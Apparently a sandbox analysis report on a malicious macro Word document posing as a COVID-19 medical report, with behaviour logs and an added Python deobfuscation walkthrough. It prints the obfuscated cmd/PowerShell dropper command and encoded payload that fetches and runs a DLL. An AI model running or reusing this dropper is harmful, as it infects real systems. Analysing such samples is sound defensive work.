Source: XP-9743 Medical report COVID-19.doc | OLE document summary: title field not present or empty
Source: XP-9743 Medical report COVID-19.doc | OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe | Console Write: (non-printable console-buffer data)
Source: C:\Windows\System32\msg.exe | Console Write: Async message sent to session Console
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: es are "Ssl3, Tls". (fragment of an error message; the rest of the buffer is non-printable)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: At line:1 char:454
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: (73 further writes of non-printable console-buffer data)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\msg.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: XP-9743 Medical report COVID-19.doc | Virustotal: Detection: 19%
Source: XP-9743 Medical report COVID-19.doc | ReversingLabs: Detection: 13%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsA
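The `-enc` argument in the cmd.exe command line above is the base64 of the script's UTF-16LE bytes, which is why an `A` recurs at fixed positions in every 8-character block. The Python below is an added example, not part of this report: it decodes the first 208 base64 characters of that argument (one complete statement; the page truncates the rest) and then collapses the string-building tricks the decoded script relies on: the `-f` format operator with reordered indices, `'a'+'b'` concatenation, parentheses around a lone literal, and backticks inside double-quoted member names. The second sample input is a constructed copy of two statements from further along the same command line, as decoded here.

```python
import base64
import re

# Constructed input: the first 208 base64 characters of the -enc argument in
# this report. 8 base64 chars = 6 bytes = 3 UTF-16LE code units, so a prefix
# whose length is a multiple of 8 decodes to whole characters. The full
# argument is truncated on the page, so only this first statement is embedded.
ENC_PREFIX = (
    "IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0A"
    "ewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4A"
    "JwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcA"
    "LAAnAFMAJwApADsA"
)

# Constructed input: two statements copied from the decoded form of the same
# command line (the SecurityProtocol assignment and the DLL-name variable).
SAMPLE_STMTS = (
    r'''( chILdiTeM VarIABlE:d0cq ).vaLue::"s`ecURIt`YpROt`OCoL" = (('Tl'+'s1')+'2');'''
    r'''$D6trw02 = (('S9'+'3')+'E');'''
)


def decode_encoded_command(enc: str) -> str:
    """Decode a PowerShell -EncodedCommand (-enc / -e / -ec) argument.

    PowerShell base64-encodes the UTF-16LE bytes of the script, so every
    ASCII byte is followed by 0x00; that is what puts an 'A' at offsets 4
    and 7 of each 8-character block ("IAAgACQA ...").
    """
    enc = "".join(enc.split())              # tolerate wrapped or pasted input
    enc += "=" * (-len(enc) % 4)            # restore stripped padding
    raw = base64.b64decode(enc)
    if len(raw) % 2:                        # truncated in the middle of a code unit
        raw = raw[:-1]
    return raw.decode("utf-16-le")


# ("{2}{0}{1}" -f 'a','b','c')  ->  'cab'
_FORMAT_RE = re.compile(
    r"""\(\s*"((?:\{\d+\})+)"\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')\s*\)""",
    re.IGNORECASE,
)
# 'ab'+'cd'  ->  'abcd'
_CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
# ('abcd')  ->  'abcd'
_PAREN_RE = re.compile(r"\(\s*'([^']*)'\s*\)")
# "crE`A`TeDiR`eCt`oRy" -> "crEATeDiReCtoRy": a backtick before a letter that is
# not a real PowerShell escape (`0 `a `b `f `n `r `t `u `v) changes nothing.
_TICK_RE = re.compile(r"`(?![0abfnrtuv])([A-Za-z])")


def _resolve_format(m):
    template, arg_blob = m.group(1), m.group(2)
    args = re.findall(r"'([^']*)'", arg_blob)
    picked = [args[int(i)] for i in re.findall(r"\{(\d+)\}", template)]
    return "'" + "".join(picked) + "'"


def deobfuscate(script: str) -> str:
    """Apply the four rewrites until a pass changes nothing."""
    prev = None
    while prev != script:
        prev = script
        script = _FORMAT_RE.sub(_resolve_format, script)
        script = _CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        script = _PAREN_RE.sub(lambda m: "'" + m.group(1) + "'", script)
        script = _TICK_RE.sub(r"\1", script)
    return script


def revealed_types(script: str) -> list:
    """Names handed to a [type] cast once the strings are reassembled."""
    return [t.lower() for t in re.findall(r"\[type\]\s*'([^']+)'", script, re.IGNORECASE)]


if __name__ == "__main__":
    decoded = decode_encoded_command(ENC_PREFIX)
    print(decoded)
    print(deobfuscate(decoded))
    print(revealed_types(deobfuscate(decoded)))
    print(deobfuscate(SAMPLE_STMTS))
```

Run as-is, the first statement resolves to a `[type]` cast of `System.IO.Directory`; the `-f` indices `{2}{5}{0}{1}{3}{4}` reorder six fragments into that name, so a string scan of the raw command for `System.IO` finds nothing. The constructed second input collapses to the SecurityProtocol assignment of the literal `Tls12` and the variable holding `S93E`, the name of the DLL the report shows rundll32 loading from `C:\Users\user\Kjl48kr\Nqm9ty9\`. The console fragments `es are "Ssl3, Tls".` and `At line:1 char:454` that the report records for powershell.exe, together with the mscorlib 2.0.0.0 sections it loaded, are consistent with that assignment failing because `Tls12` is not a `SecurityProtocolType` member on the .NET 2.0 runtime; that is an inference from the report's own lines, not something the report states.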
[Source: unknown] Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
[Source: unknown] Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
[Source: unknown] Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
[Source: unknown] Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
[Source: unknown] Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA
[Source: unknown] Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA
[Source: unknown] Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogA
[Source: unknown] Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogA
[Source: unknown] Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogA
[Source: unknown] Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogA
[Source: unknown] Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogA
[Source: unknown] Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogA
[Source: C:\Windows\System32\cmd.exe] Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
[Source: C:\Windows\System32\cmd.exe] Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc [base64-encoded command omitted]
[Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe] Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
[Source: C:\Windows\System32\rundll32.exe] Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
[Source: C:\Windows\SysWOW64\rundll32.exe] Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA
[Source: C:\Windows\SysWOW64\rundll32.exe] Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA
[Source: C:\Windows\SysWOW64\rundll32.exe] Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogA
[Source: C:\Windows\SysWOW64\rundll32.exe] Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogA
[Source: C:\Windows\SysWOW64\rundll32.exe] Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogA
[Source: C:\Windows\SysWOW64\rundll32.exe] Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogA
[Source: C:\Windows\SysWOW64\rundll32.exe] Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogA
[Source: C:\Windows\SysWOW64\rundll32.exe] Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogA
[Source: C:\Windows\SysWOW64\rundll32.exe] Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
[Source: Window Recorder] Window detected: More than 3 window changes detected
[Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe] File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
[Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE] Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
[Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE] File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb.dll source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb* source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2088678601.0000000002840000.00000002.00000001.sdmp
[Source: XP-9743 Medical report COVID-19.doc] Initial sample: OLE summary subject = Licensed Soft Chips TCP capacity Future Savings Account redundant open-source Consultant Cambridgeshire digital Synergistic

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
[Source: XP-9743 Medical report COVID-19.doc] Stream path 'Macros/VBA/Gx8fznt8p0b' : High number of GOTO operations
[Source: VBA code instrumentation] OLE, VBA macro, High number of GOTO operations: Module Gx8fznt8p0b, Name: Gx8fznt8p0b
Document contains an embedded VBA with many randomly named variables
[Source: XP-9743 Medical report COVID-19.doc] Stream path 'Macros/VBA/Gx8fznt8p0b' : High entropy of concatenated variable names
Obfuscated command line found
[Source: unknown] Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Suspicious powershell command line found
[Source: unknown] Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
[Source: C:\Windows\System32\cmd.exe] Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc [base64-encoded command omitted]
[Source: S93E.dll.5.dr] Static PE information: real checksum: 0x60901 should be: 0x5c940
[Source: S93E.dll.5.dr] Static PE information: section name: .text4
[Source: S93E.dll.5.dr] Static PE information: section name: .text5
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 7_2_10001698 push ebp; retf 7_2_1000169A
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 7_2_10001113 push esp; ret 7_2_10001131
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 7_2_0019E8D0 push edx; ret 7_2_0019E9D4
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 7_2_0018388E push esi; retf 7_2_001838BD
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 7_2_00183A42 push ebx; retf 7_2_00183A44
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 7_2_00183272 push edi; ret 7_2_00183273
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 7_2_00184BAB push ebp; iretd 7_2_00184BB9
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 7_2_001823D7 push cs; iretd 7_2_001823D8
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 8_2_0019E8D0 push edx; ret 8_2_0019E9D4
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 8_2_0018388E push esi; retf 8_2_001838BD
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 8_2_00183A42 push ebx; retf 8_2_00183A44
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 8_2_00183272 push edi; ret 8_2_00183273
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 8_2_00184BAB push ebp; iretd 8_2_00184BB9
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 8_2_001823D7 push cs; iretd 8_2_001823D8
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 9_2_0019E8D0 push edx; ret 9_2_0019E9D4
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 9_2_0018388E push esi; retf 9_2_001838BD
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 9_2_00183A42 push ebx; retf 9_2_00183A44
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 9_2_00183272 push edi; ret 9_2_00183273
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 9_2_00184BAB push ebp; iretd 9_2_00184BB9
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 9_2_001823D7 push cs; iretd 9_2_001823D8
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 10_2_0015E8D0 push edx; ret 10_2_0015E9D4
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 10_2_0014388E push esi; retf 10_2_001438BD
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 10_2_00143A42 push ebx; retf 10_2_00143A44
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 10_2_00143272 push edi; ret 10_2_00143273
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 10_2_00144BAB push ebp; iretd 10_2_00144BB9
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 10_2_001423D7 push cs; iretd 10_2_001423D8
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 11_2_0019E8D0 push edx; ret 11_2_0019E9D4
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 11_2_0018388E push esi; retf 11_2_001838BD
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 11_2_00183A42 push ebx; retf 11_2_00183A44
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 11_2_00183272 push edi; ret 11_2_00183273
[Source: C:\Windows\SysWOW64\rundll32.exe] Code function: 11_2_00184BAB push ebp; iretd 11_2_00184BB9

Persistence and Installation Behavior:

Creates processes via WMI
[Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE] WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
[Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe] File created: C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll
[Source: C:\Windows\SysWOW64\rundll32.exe] PE file moved: C:\Windows\SysWOW64\Giyrh\pugu.vsm

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
[Source: C:\Windows\SysWOW64\rundll32.exe] File opened: C:\Windows\SysWOW64\Giyrh\pugu.vsm:Zone.Identifier read attributes | delete
[Source: C:\Windows\SysWOW64\rundll32.exe] File opened: C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn:Zone.Identifier read attributes | delete
[Source: C:\Windows\SysWOW64\rundll32.exe] File opened: C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm:Zone.Identifier read attributes | delete
[Source: C:\Windows\SysWOW64\rundll32.exe] File opened: C:\Windows\SysWOW64\Ipdtn\rmgx.ktd:Zone.Identifier read attributes | delete
[Source: C:\Windows\SysWOW64\rundll32.exe] File opened: C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh:Zone.Identifier read attributes | delete
[Source: C:\Windows\SysWOW64\rundll32.exe] File opened: C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz:Zone.Identifier read attributes | delete
[Source: C:\Windows\SysWOW64\rundll32.exe] File opened: C:\Windows\SysWOW64\Fmtjatw\czosow.gcn:Zone.Identifier read attributes | delete
[Source: C:\Windows\SysWOW64\rundll32.exe] File opened: C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp:Zone.Identifier read attributes | delete
[Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE] Process information set: NOOPENFILEERRORBOX
[Source: C:\Windows\System32\cmd.exe] Process information set: NOOPENFILEERRORBOX
[Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe] Process information set: NOOPENFILEERRORBOX
[Source: C:\Windows\System32\rundll32.exe] Process information set: NOOPENFILEERRORBOX
[Source: C:\Windows\SysWOW64\rundll32.exe] Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2308Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
